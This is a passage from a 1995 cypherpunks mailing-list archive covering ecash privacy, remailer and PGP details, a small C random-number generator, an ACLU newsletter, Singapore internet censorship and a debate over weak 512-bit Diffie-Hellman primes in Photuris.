the vendors - the bank knows who spent them.  Maybe for penny level
transactions that is not a big deal, although if for-pay web browsing
becomes common then it does seem like it would present a privacy
threat.  Every web site you visit (not the specific pages, but the
overall site names) would be known by the bank - quite a significant
piece of marketing data.

The point is that if the anonymity afforded by ecash is too costly in
terms of time, then we may end up stuck with a non-anonymous system
simply because that is the only one efficient enough to work.  It would
be good to find out if that is a serious problem.

Hal Finney




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kevin S. Van Horn" <vanhorn@hks.net>
Date: Thu, 9 Nov 1995 08:23:00 +0800
To: cypherpunks@toad.com
Subject: Re: DejaNews all over again--a URL for Usenet Searching
Message-ID: <199511082054.PAA07132@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

tcmay@got.net (Timothy C. May) wrote:
>
>Paul Robichaux pointed me to another searcher, http://www.excite.com/,
>which _does_ index the alt groups. I'm sure more are coming, reaching
>further and further back in time.

A small point of information.  I work for Architext, the company that provides
the excite service.  We only keep the last two weeks of USENET news around,
and don't keep any archives going further back than that.  USENET is just too
damn huge for us to go to the trouble of keeping comprehensive archives around
without good evidence of demand for it among our target audience.

- ------------------------------------------------------------------------------
Kevin S. Van Horn | Uncle Sam needs YOU!
vanhorn@atext.com | But not vice versa.

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMKEY8ioZzwIn1bdtAQFFEgGA1e12AazfexoLEvlrQDWFGPqFOXafAgBZ
NxKKd+nWATgsUQhwI7jQ0P8pTQ9XvI1k
=7sgB
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lance Cottrell <loki@obscura.com>
Date: Thu, 9 Nov 1995 09:52:24 +0800
To: Raph Levien <raph@CS.Berkeley.EDU>
Subject: Re: PGP Comment feature weakens remailer security
In-Reply-To: <199511081943.LAA24863@kiwi.cs.berkeley.edu>
Message-ID: <Pine.3.89.9511081605.A20339-0100000@obscura.com>
MIME-Version: 1.0
Content-Type: text/plain


I think you are fine if the odds of corrupting the message are less than 
the odds of getting hit by a a falling meteor while running the program. 
In general there is little point in making any one part of the system 
many orders of magnitude more reliable than any other part.

	-Lance


On Wed, 8 Nov 1995, Raph Levien wrote:

>    Point well taken.
> 
>    I'm seriously considering completely disabling the PGP comment
> feature when invoked from premail. In fact, that's what the new code
> does right now.
> 
>    On an unrelated topic... cypherpunks like to count bits, right?
> What is the correct number of pseudorandom bits to use in a MIME
> multipart separator? If the data has a line which matches the
> separator, the message is corrupted. Of course, if you can take
> multiple passes through the data, you can simply verify that it does
> not contain a line which matches the separator. But if you're
> restricted to a single pass, then the only way to do it is to use a
> randomly generated separator.
>    I figure that 128 bits should _definitely_ be enough (that's what
> is in the new premail code now). Even 64 bits should ensure that it is
> unlikely that anyone will ever experience message corruption over the
> expected lifetime of premail. However, it makes me nervous. What do
> people think?
> 
> Raph
> 

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Fri, 10 Nov 1995 08:13:42 +0800
To: <mcip@deepeddy.com>
Subject: European Online Development list
Message-ID: <v03003b01acc6f3c3d676@[129.46.82.88]>
MIME-Version: 1.0
Content-Type: text/plain


[In case this interests any of you. -dave]

................................. cut here .................................

>Date: Wed, 8 Nov 1995 19:28:25 +0100
>From: steve@isys.hu (Steven Carlson)
>Subject: invitation to join the European Online Development list
>
>Greetings -
>
>I'm writing to invite you to join the European Online Development list
><online-europe>. If you're active or interested in Internet in Europe or
>the CIS, this list may be for you.
>
>I'm inviting you because you're one of my circle of contacts, and work
>either in journalism or in an Internet-related field. I'm sending a
>similar letter out to several hundred people who attended Esther Dyson's
>East-West High-Tech Forum, held recently in Bled, Slovenia.
>
>A day before this year's conference opened, Esther held a special meeting
>of Internet providers and related companies from around Europe and the
>CIS. We all agreed it was a very useful meeting, that we should meet again
>soon, and that we should all try to keep in contact over the net.
>Therefore this list.
>
>As commercial Internet pioneers in Europe, we find ourselves in surprising
>agreement on a number of topics. Though many of us now earn our daily
>bread from providing Internet connectivity, many of us suspect the real
>future may be in content. Yet what form this new medium will take - or who
>will pay how much for what - still remains a mystery.
>
>We share concerns about privacy, copyright, encryption, censorship and
>libel. In each of our countries, these and other issues will eventually
>need to be addressed by new laws, laws that will be written by people who
>- we suspect - know very little about online realities.
>
>In each of our countries, the local PTT is waking up to the smell of
>profits in the IP market. These telecoms much prefer a comfortable
>monopoly to the vagaries of competition. The PTTs have considerable
>financial resources and political connections. How can smaller Internet
>providers compete with these giants on even terms? Who will guarantee a
>level playing field?
>
>I think you'll agree there's plenty to talk about. And at this early stage
>in the development of Internet that's exactly what we need to do.
>
>I hope this list becomes a useful resource: a place to learn what others
>are doing in Europe and the CIS; a place to identify potential partners; a
>place to watch and learn.
>
>To subscribe, send a message with no subject line, and the text: subscribe
>online-europe, to <majordomo@isys.hu>. Contact me if you need help
><steve@isys.hu>.
>
>Once you subscribe, you might want to a send a message to the list
>introducing yourself and your company. Give us some idea of what problems
>you're working with in the field of Internet media or connectivity. Or, if
>you like, share with us your success stories.
>
>Send your posts to <online-europe@isys.hu>
>
>A full WWW archive of online-europe is available at
><http://www.isys.hu/online-europe>. Don't get too excited yet. At present
>all you'll find there are some test messages.
>
>Thanks for your attention, look forward to seeing you on the list.
>
>=steve=
>
>---
>Steven Carlson
>iSYS Hungary info@isys.hu
>steve@isys.hu http://www.isys.hu






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 9 Nov 1995 09:56:45 +0800
To: cypherpunks@toad.com
Subject: Re: PGP Comment feature weakens remailer security
Message-ID: <199511090020.QAA12479@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 Nov 1995, Raph Levien wrote:

>    On an unrelated topic... cypherpunks like to count bits, right?

Mmmm, sometimes we do ... <g>

Sometimes we even think, if I were a lil wa'bbit, where would I go hide
... especially when we do a bad Elmer Fudd impression of Bugs Bunny. <p>

> What is the correct number of pseudorandom bits to use in a MIME
> multipart separator? If the data has a line which matches the
> separator, the message is corrupted.  Of course, if you can take
> multiple passes through the data, you can simply verify that it does
> not contain a line which matches the separator. But if you're
> restricted to a single pass, then the only way to do it is to use a
> randomly generated separator.

An interesting problem.  

If you are going to take multiple passes, and do top-down and bottom up
analysis, then you can't really parse on the fly. It pretty much has to be
a batch job, I think.  You have to get your data, and then check it.  You
can't simply *trust* that there is not any corruption, and pass all of
your data through. 

And if you're going to parse in a single pass, then we're back to the 
problem of monkeys sitting at typewriters and Shakespeare's sonnets.

>    I figure that 128 bits should _definitely_ be enough (that's what
> is in the new premail code now). Even 64 bits should ensure that it is
> unlikely that anyone will ever experience message corruption over the
> expected lifetime of premail. However, it makes me nervous. What do
> people think?

Unfortunately, it's not quite that simple.  

The likelyhood of corruption is not based on each past run.  It's just 
like rolling dice.  The odds of rolling boxcars is 1 in 36 (I think) no 
matter how many prior times, you've rolled boxcars.

Twenty passes doesn't influence whether you crap out or not on a single
roll.  Nothing *remembers* past performance to ensure that something
doesn't happen (or happens) many, many times in a row.  I guess, this is
why Atlantic City, Baden Baden, and Las Vegas generally do as well as they
do. 



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Thu, 9 Nov 1995 10:16:55 +0800
To: cypherpunks@toad.com
Subject: "Industry Group Rebuffs U.S. on Encryption" (NYT 8Nov95, C3)
Message-ID: <9511090050.AA01828@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


A group of 37 companies and trade and privacy associations sent a
letter to Al Gore yesterday, complaining about Clipper-II and crypto
export controls, and promising to send their own policy proposals
to Congress and the Administration within six months.

It's a short story.  I'll leave the exact text to John Young :-).
I've heard that there's a better story in the Washington Post today, too.
I expect we'll see the letter itself within a day or two.

	John Gilmore




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patrick J. LoPresti" <patl@catfish.lcs.mit.edu>
Date: Thu, 9 Nov 1995 08:43:27 +0800
To: cypherpunks@toad.com
Subject: Re: PGP Comment feature weakens remailer security
Message-ID: <199511082151.QAA05650@catfish.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

 bill.stewart> So, for safety, either turn off PGP comments before
 bill.stewart> using it with remailers, or wipe out the comments by
 bill.stewart> hand before each layer of encryption (easy to do with
 bill.stewart> GUI-based systems like Private Idaho; I don't know if
 bill.stewart> premail lets you do this or not.)

Incidentally, Mailcrypt's remailer support strips the comment field
after each encryption, and has done so since version 3.2.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAwUBMKEmVHr7ES8bepftAQEPSgP9FJYeKUSZKyFN/VWIwLjKIaDVzPtzyqHR
tbj1UqbDl1trrKCoV6uud5qfK/FQwqQylnv1YsYNIVPPav66ImUvgSaXUMvZJBvC
8vinQI66s3M1PBJ8VIaLuVtay826JDazGHEexHpDLwNVGLdJq0RrNLVr2H9oLA8g
5aE9MHVfAcM=
=MdHQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Andrew Stevenson <frank@funcom.no>
Date: Thu, 9 Nov 1995 09:14:16 +0800
To: cypherpunks@toad.com
Subject: True Random (short c-source)
Message-ID: <Pine.SGI.3.91.951108165325.25592A-100000@odin>
MIME-Version: 1.0
Content-Type: text/plain


I have written a short random number generator which appears to produce
reasonable random numbers even in DOS, at the heart of the code is the
short function fGetRand, the amount of entropy derived from this
function varies from >1 to >>6 depending on system load, I haven't
made any effort to whiten it at all. I am not making any claims about
its usefulness. I am only trying to demonstrate the ease at which
good random number may be obtained. Any comments and analysis will be
mostly welcome, the source is hereby placed in the public domain:

I have used WATCOM10 to compile and test under DOS/WIN95, where
clock is running at 18hz. I have also tested on IRIX with impressive
results.

--- START ----
#include <time.h>
#include <stdio.h>

int   fGetRand (void);

main (void) {
   long vCount;
   FILE *out;
   int byte;
   int tick;

   out=fopen("random.bin","wb");
   if(out==NULL) {
      printf("cant write to file random.bin\n");
      exit(1);
   }

   for(vCount=1;vCount<=512;vCount++) {
      tick=fGetRand()&0x01;
      byte=byte+byte+tick;
      if((vCount & 0x7)==0) fputc((char)byte,out);
      fputc((char)tick,out);
   }

   fclose(out);
}


int   fGetRand (void) {
   int count;
   clock_t tick;

   tick=clock();
   while(tick==clock()) count++;

   return (count);
}
----- END -----

PGP encrypted mail preferred, finger for key.
The above views are ONLY endorsed by BoggleMind Inc. (not to be confused
with MindBoggle Ltd.)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ACLUNATL@aol.com
Date: Thu, 9 Nov 1995 10:42:47 +0800
To: beeson@aclu.org
Subject: ACLU Cyber-Liberties Update: Nov. 8, 1995
Message-ID: <951108171518_82372328@mail04.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


-----------------------------------------------------------------
November 8, 1995
ACLU CYBER-LIBERTIES UPDATE
A bi-weekly e-zine on cyber-liberties cases and controversies
at the state and federal level.
-----------------------------------------------------------------
IN THIS ISSUE:

*  ACLU Statement and ACTION ALERT on Federal Wiretap Bill

*  ACTION ALERT on Federal Online Indecency Legislation

*  State Utility Commissions Consider Online Access and Privacy Issues

*  News on Electronic Access to Public Information in Washington State

*  John Perry Barlow Launches Cyberspace Lecture Series Co-Sponsored by the
ACLU of Washington

*  ACLU Student Chapter President at Georgetown University Law Center Writes
About Marty Rimm Controversy

*  Conferences

*  Online Resources from the ACLU National Office and State Affiliates

-----------------------------------------------------------------
FEDERAL PAGE (Congress/Agency/Court Cases)
-----------------------------------------------------------------
* ACLU Statement and ACTION ALERT on Federal Wiretap Bill

Last week, the ACLU emphatically urged the FBI to withdraw its proposal for
greatly increased wiretapping powers.  "Given the government's own statements
on the usefulness of wiretaps, we can only guess at the FBI's motives," said
Laura W. Murphy, Director of the ACLU's National Washington Office.  "But if
Congress were to allow this system to go into place, we'd have a national
surveillance apparatus that would pale in comparison to the infamous security
state of the former Soviet Union."

"This proposal, Murphy added, "would make the KGB look like privacy
advocates."

"The proposal would dramatically reduce the privacy rights in the United
States because it would -- no matter what the Justice Department says --
result in significant increase in the number of innocent third party
conversations intercepted by law enforcement officials," Murphy said.
 "Already too many innocent conversations -- nearly two million in the last
year alone -- are intercepted by federal and local law enforcement wiretaps."

According to the government's own statistics, 1,800 innocent conversations
are intercepted each and every time a wiretap or other form of electronic
surveillance is placed.

Just last week, the ACLU joined with the National Rifle Association and a
broad coalition of other gun advocates and civil liberties organizations in
calling for Congress to institute a 24-point reform plan for federal law
enforcement.  In a letter to Congress, the groups said that the excesses of
Waco and Ruby Ridge demonstrate that Congress and the Administration must
begin to reign in the powers of federal police authorities.

[The 24-point reform plan and related documents are available on America
Online, at keyword ACLU, under "federal law enforcement reforms."  For an
e-mailed copy of the reform plan, send a message to infoaclu@aclu.org with
"fed law enforcement reform" in the subject line.]

URGENT ACTION NEEDED:

-Call the FBI at 202-252-7296 and urge it to withdraw the proposed
wiretapping system.  You can also find the phone number of the FBI's local
field offices at the FBI web site at http://www.fbi.gov.

-Call the Attorney General at 202-514-2001 and urge her to order the FBI to
withdraw its wiretapping proposal.

-Call your members of Congress and tell them to urge the Justice Department
and the FBI to withdraw the wiretap proposal.  Urge your representatives to
oppose any funding for this wiretap scheme.  You can reach the Capitol
Switchboard at 202-224-3121 for the Senate and 202-225-3121 for the House of
Representatives.

-Call Rep. Bob Barr (R-GA), a former federal prosecutor and leading opponent
of funding effots for wiretap:

     Rep. Bob Barr
     U.S. House of Representatives
     1607 Longworth Building
     Washington, DC 20515
     (202) 225-2931

-Call your own telephone companies, both local and long distance, and urge
them to oppose the wiretap proposal and to stand up for the privacy rights of
their customers instead of becoming the snooping arm of a prying government.

-----------------------------------------------------------------
*  ACTION ALERT on Federal Online Indecency Legislation

The conference committee on the telecommunications bill will soon consider
whether to remove provisions that would make "indecency" a crime in
cyberspace.  On Monday, November 6, we distributed an action alert urging
individuals to call Congress to express opposition to any measures to censor
the Net.

THIS MAY BE YOUR LAST CHANCE TO STOP UNCONSTITUTIONAL RESTRICTIONS ON YOUR
RIGHT TO FREE SPEECH IN CYBERSPACE!!

[You can find the action alert on America Online, at keyword ACLU, under
"threats to civil liberties in cyberspace," or on the Internet at
http://www.vtw.org/]

In addition to the call to action for individual Net users, the ACLU and
People for the American Way obtained signatures from over 75 organizations to
a letter opposing the federal online indecency provisions.  The letter will
be sent to Senator Pressler and Representative Bliley on the conference
committee later this week.

[After 11/13, you can find a copy of the organizational letter on America
Online, at keyword ACLU, under "threats to civil liberties in cyberspace."
 To receive a copy of the letter via e-mail, send a message to
infoaclu@aclu.org with "organizations opposed to online censorship" in the
subject line.]

The ACLU continues to prepare for a constitutional challenge to the online
censorship provisions if they become law.  Please contact Ann Beeson,
beeson@aclu.org, if your organization is interested in being a plaintiff in
this ground-breaking litigation that will define First Amendment rights in
cyberspace.

-----------------------------------------------------------------
STATE PAGE (Legislation/Agency/Court Cases)
-----------------------------------------------------------------
*  State Utility Commissions Consider Online Access and Privacy Issues

Many state utilities commissions are considering issues that can affect your
online access and privacy rights, from approving caller ID to defining
universal access.  Online users are urged to stay informed and involved in
utilities commission decisions in their states that may affect cyberspace
rights.  Consumer Project on Technology has put up a list of information
about state utility commissions.  The list includes contact information for
all 50 state utility commissions, and also lists utility consumer advocates
in 40 states.

See http://www.essential.org/cpt/isdn/contacts.html

-----------------------------------------------------------------
*  News on Electronic Access to Public Information in Washington State

A Washington State task force has been examining the issue of electronic
access to information maintained by government agencies.  The ACLU of
Washington submitted comments commending the task force for requiring some
form of free electronic access, and limiting all fees to incremental costs.
 But the task force was criticized for not paying sufficient attention to
privacy, especially increased threats to privacy presented by accumulation of
information on individuals from diverse sources.  

Also in Washington State, King County Superior Court Judge George Finkle
ruled that Geographical Information System databases are public records and
must be made available to the public for nominal copying fees.  (GIS systems
are databases that contain information associated with a physical location,
such as the location of utility cables, public buildings, roads, demographic
information, zoning info, or traffic density.)  As in many locations around
the country, the City of Bellevue had attempted to charge far higher fees for
GIS databases, which were created for government use but also have commercial
value.  This ruling reaffirms the notion that public information should be
available to all, not just those with deep pockets.

-----------------------------------------------------------------
*  John Perry Barlow Launches Cyberspace Lecture Series Co-Sponsored by the
ACLU of Washington

The ACLU of Washington began a series of talks in Seattle to explore the
impact and implications of the technology revolution on art and culture.
 John Perry Barlow, former Grateful Dead lyricist and co-founder of the
Electronic Frontier Foundation, launched the series on November 3rd.
 "Cyberspace is largely about conversation that ultimately could include
everybody on the planet . . . . Cyberspace can be the greatest venue for
freedom of expression humans have ever had," said Barlow.  Barlow talked of
the spiritual dimension of cyberspace, which he sees as an egalitarian
ecosystem with the potential to link "every synapse on the planet."  For him
cyberspace must be a place where anybody can say anything they think without
fear of reprisal.  But he tempered his lyrical vision of cyberculture with a
warning of the dangers of censorship from elected officials who do not
appreciate -- or even understand -- how new forms of communication function.
 "When I visit Congress, I feel like Tom Paine in the Court of King George,"
Barlow quipped.

-----------------------------------------------------------------
*  ACLU-Georgetown University Law Center President Writes Articles on the
Marty Rimm controversy

Alan Lewine, President of the ACLU student chapter at GULC, has written a
series of articles for the Georgetown Law Weekly on the Georgetown Law
Journal's involvement in the controversial publication of Marty Rimm's
purported study of net porn. They are available at
http://www.tripod.com/userland/A/alewine/index.html

-----------------------------------------------------------------
CONFERENCES
-----------------------------------------------------------------
Nov 8, 6 pm: "Regulating the Internet: Should Pornography Have A Free Ride on
the Information Superhighway?"  Benjamin N. Cardozo School of Law, 55 Fifth
Avenue, New York, New York.  Panelists include Nadine Strossen, National
President, ACLU; Bill Burrington, Staff Counsel of the Electronic Frontier
Foundation; and Barbara Bennett Woodhouse, Professor of Law at University of
Pennsylvania Law School.  Sponsored by the Cardozo Arts & Entertainment Law
Journal.

Nov 16, 5 pm: Nadine Strossen (National President, ACLU) speaks on "Defending
Pornography: A Feminist Perspective on New Technologies and Old-Fashioned
Sex," GULC, 600 New Jersey NW, 12th Floor Ballroom, Gewirz Hall.
 Co-sponsored by ACLU-GULC and the Student Bar Association Speakers Fund.

-----------------------------------------------------------------
ONLINE RESOURCES FROM THE ACLU NATIONAL OFFICE
-----------------------------------------------------------------
Stay tuned for news on the ACLU's world wide web site, under construction at
http://www.aclu.org.  America Online users should check out our live chats,
auditorium events, *very* active message boards, and complete news on civil
liberties, at keyword ACLU.

-----------------------------------------------------------------
ONLINE RESOURCES FROM ACLU STATE AFFILIATES
-----------------------------------------------------------------
Florida:
ACLU of Pinellas County Florida
http://www.stpt.usf.edu/~greek/aclu.html

Illinois:
Illinois Civil Liberties Union
http://www.aclu-il.org/

Champaign County, Illinois ACLU Chapter
http://www.prairienet.org/cc-aclu/
(The chapter also maintains an Illinois Civil Liberties Alert List.  To
subscribe send a message to cla@prairienet.org)

Indiana:
Indiana Civil Liberties Union
http://www.inetdirect.net/iclu/

South Carolina:
ACLU of South Carolina
http://www.cris.com/~katrinan/aclu/index.html

-----------------------------------------------------------------
ACLU Cyber-Liberties Update
Editor: Ann Beeson (beeson@aclu.org)
American Civil Liberties Union National Office
132 West 43rd Street
New York, New York 10036

To subscribe to the ACLU Cyber-Liberties Update, send a message to
infoaclu@aclu.org with "subscribe Cyber-Liberties Update" in the subject line
of your message.  To terminate your subscription, send a message to
infoaclu@aclu.org with "unsubscribe Cyber-Liberties Update" in the subject
line.

For general information about the ACLU, write to infoaclu@aclu.org.
-----------------------------------------------------------------
**PLEASE REPOST WITH HEADER INTACT**




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Thu, 9 Nov 1995 10:44:36 +0800
To: Lance Cottrell <loki@obscura.com>
Subject: Re: PGP Comment feature weakens remailer security
In-Reply-To: <199511081943.LAA24863@kiwi.cs.berkeley.edu>
Message-ID: <199511090147.RAA31271@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I think you are fine if the odds of corrupting the message are less than 
> the odds of getting hit by a a falling meteor while running the program. 
> In general there is little point in making any one part of the system 
> many orders of magnitude more reliable than any other part.

I agree entirely. That's why my PGP key at school is 382 bits. It's a
lot easier to compromise my machine than factor a 382 bit number.

So let me rephrase the question: what's the minimum number of entropy
bits that can be used and still give you that warm and fuzzy feeling
that you don't have to worry about the possibility that the message
might be corrupted?

The winning answer gets a free mention in the PGP/MIME Implementation
notes Web page: http://www.c2.org/~raph/impl.html

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 9 Nov 1995 08:38:43 +0800
To: cypherpunks@toad.com
Subject: Cybercensor in Singapore
Message-ID: <199511081715.SAA19894@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



NY Times, November 8, 1995, Editorial


Cyberspace in Singapore. The Internet Threat to Official
Censorship

"The Internet is like fire," Mr. Yeo said. "If you don't 
learn how to control it, it will burn you." In Singapore, 
a little democracy can be a dangerous thing.


Singapore. From his 37th-floor office overlooking
Singapore Strait, George Yeo can survey the oil
refineries and bustling dockyards that helped make
Singapore the trade and financial center of Southeast
Asia. But the view that interests the Minister of
Information and the Arts these days is not the vista
beyond his window. It is the image on the computer
terminal at his desk. Mr. Yeo, like the rest of
Singapore's top politicians, wants his country to be a
leader in the manufacture and use of computer technology
without relinquishing the Government's chokehold on the
dissemination of information in Singapore.

Singapore's effort to find a balance point will be
closely watched by other Asian countries that mix
capitalist economics with authoritarian politics. The
difficulty was underlined last week. Even as Mr. Yeo
worried about the perils of the Internet, the Government
announced it was relocating 500 industrial enterprises to
make room for the development of advanced electronics
manufacturing plants.

Contradictions like that abound in Singapore, a country
that eludes simple classification. With its gleaming
skyscrapers and shopping arcades, it can seem like Dallas
transplanted to the South China Sea. Conversely, the
dominance of one political party and the presence of a
paternalistic Government can make it feel like a remnant
of the Soviet bloc. Salman Rushdie's "Satanic Verses" and
Cosmopolitan magazine are banned, yet the city's largest
bookstore stocks a selection of contemporary literature
and the works of Chee Soon Juan, Singapore's opposition
leader.

Singapore's gaudy prosperity challenges the American
faith that individual liberty is essential for a vital
marketplace. George Yeo is the personification of that
challenge. Born in Singapore in 1954, educated at
Cambridge University and Harvard Business School, he is
disdainful of the cacophony and untidiness of American
democracy. Like Lee Kuan Yew, the architect and ruler of
modern Singapore, he believes the vulnerabilities of his
ethnically divcrse city-state can be best handled by a
strong government that encourages a sense of community
and limits individual rights.

But controlling semiconductors is not the same as
controlling newspapers, television networks or political
opponents. With the aggressive use of libel and slander
statutes Singapore's leaders have intimidated the
newspapers that publish here, including The International
Herald Tribune. To control television broadcasting, the
Government has banned household use of satellite dishes.
Some political pluralism is permitted, but no one doubts
the primacy of Mr. Lee's People's Action Party.

Recognizing the risk of bottling up public demand for
foreign television broadcasts, Singapore's leaders are
wiring the country for cable television. That way viewers
will receive many more channels, including MTV, while the
Government will still be able to screen out programming
it finds objectionable. It is the quintessential
Singapore solution.

Singapore's approach to controlling cyberspace is equally
ingenious, but harder to enforce. Mr. Yeo, essentially,
hopes to control the Internet by embracing it. He is
encouraging use of the Internet by equipping schools with
computers, and establishing systems that allow
Singaporeans to link up with the computer network by
dialing a local phone number.

The catch is that the Government will be able to monitor
use of the Internet that goes through local servers, and
is already intervening to block material it considers
pornographic. The Government has blunted an uncensored
Internet forum on Singapore political life by assembling
a group of users who make sure the Government's views are
represented.

Mr. Yeo concedes that more sophisticated and affluent
users can outflank many of his defenses by dialing into
the Internet through foreign phone systems. His purpose,
he says, is to lay down markers for citizens, expecting
that most will abide by them. "The Internet is like
fire," he said. "If you don't learn how to control it, it
will burn you." In Singapore, a little democracy can be
a dangerous thing.

Philip Taubman

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Fri, 10 Nov 1995 03:04:09 +0800
To: cypherpunks@toad.com
Subject: [Sci-Fi] Re: expiration dates on cryptography
In-Reply-To: <acc62dde07021004cd59@[205.199.118.202]>
Message-ID: <9511081824.ZM25431@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain


For methods of jiggering physical clocks, one might eventually reach the
stage of attempting to have physically unjiggable clocks. [Well, theoretically
unjiggable, just as our hideously huge composites are thought unfactorable
by computability arguments.]

Example:
I have a piece of information which I wish to remain secret until a well-
defined date in the future. I encrypt it then lob a package containing
the information into a well-defined and predictable trajectory which will
cause it to intersect the earth's trajector at that time [or shortly
thereafter]. I would [guess, hope, no, I haven't sat here and calculated]
that there should exist possible systems where beyond an initial period of
about a week, there would be no earthly technology capable of catching
up with the packet.

Alright, so it's hideously expensive. But you could put a lot of information
into one packet. Apollo Assured Archiving could have fixed rates per megabyte,
with regular [monthly?] launches into reliable orbits. At which point the
joy becomes making sure there aren't packet-catching bases on the far
side of Mercury... [with the mind control lasers, of course]

frodo

--
Richard Martin
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@aw.sgi.com/g4frodo@cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 9 Nov 1995 10:47:32 +0800
To: "Kevin S. Van Horn" <cypherpunks@toad.com
Subject: This is an Architext Document: Read Carefully!
Message-ID: <acc69c7a11021004ca00@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:54 PM 11/8/95, Kevin S. Van Horn wrote:

>A small point of information.  I work for Architext, the company that provides
>the excite service.  We only keep the last two weeks of USENET news around,
>and don't keep any archives going further back than that.  USENET is just too
>damn huge for us to go to the trouble of keeping comprehensive archives around
>without good evidence of demand for it among our target audience.

Small world. "Architext" is also the hypertext program I use to cross-index
many articles. I'm surprised the new company, also called "Architext,"
picked a name which will increase confusion.

("Architext," BrainPower, Inc., Agoura Hills, CA.)

No Cypherpunks relevance, except to show how name collisions can occur.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Thu, 9 Nov 1995 08:33:11 +0800
To: karn@qualcomm.com
Subject: Re: Photuris Primality verification needed
In-Reply-To: <199511080146.RAA22568@servo.qualcomm.com>
Message-ID: <199511081833.TAA10801@soikko.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


> Well, since we already require 56-bit DES in ESP in the interests of
> promoting basic interoperability, wouldn't a 512-bit prime be
> similarly sufficient?

*NO*, because you have to break the 56-bit DES separately every time,
whereas doing the precomputation for the 512 bit prime is a one-time
job.  Once anyone has done the precomputation, *all* communications
will be open to whoever is in possession of the database.

I think there is good reason to believe that if the 512 bit prime is
allowed, it will be widely used, and even if it is found breakable, it
will not be easily changed (just think about the experience with Sun's
"secure" rpc, and how quickly their primes have been changed - and it
still has much narrower deployment than what is hoped for ipsec).

Let me include below a message I sent to Bill Simpson.  

> If it is kept, the commercial vendors will probably start using it
> as default because it is faster than the others, and the state
> department will pressure them to do so.  Then we are again left with
> too weak aprotections (in other words, pseudo-security which makes
> people believe they have protection, when they actually don't).
> After the precomputation, it is apparently cheap enough to crack the
> exchange that it can be done on a mass scale to all exchanges
> between a very large number of hosts.  I find this very harmful, as
> it again provides no protection against mass surveillance.  We are
> already too close to an Orwellian society.

The remarks there apply equally well to organized criminals, large
corporations, and hostile governments.  Or, suppose some group manages
to get access to enough idle time, computes the database, and posts it
on the Internet.  I for one would be willing to contribute CPU time on
machines where I have access to help such a group, because I think it
is better that it is widely known and publicized when there is little
security and privacy.

Including the provision for the 512 bit prime is *HARMFUL* and
*DANGEROUS*.  Export control is not really an issue here, because if
companies in the United States cannot provide secure networking,
there are other companies in the world that can.

    Tatu Ylonen <ylo@cs.hut.fi>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@qualcomm.com>
Date: Tue, 14 Nov 1995 05:48:20 +0800
To: bal@martigny.ai.mit.edu
Subject: Re: Photuris Primality verification needed
In-Reply-To: <199511081704.JAA07274@qualcomm.com>
Message-ID: <199511090337.TAA04357@servo.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


>I don't know.  Maybe the right thing to do is require conforming
>implementations to support a large modulus but include recommended
>smaller moduli.  Then Alice can always force Bob to use the large
>modulus but, if both agree, they can use something smaller from the
>standard or even their own home-grown modulus.

Thanks. That's pretty much what we are doing -- requiring a particular
1024-bit modulus but recommending several others as options. There's a
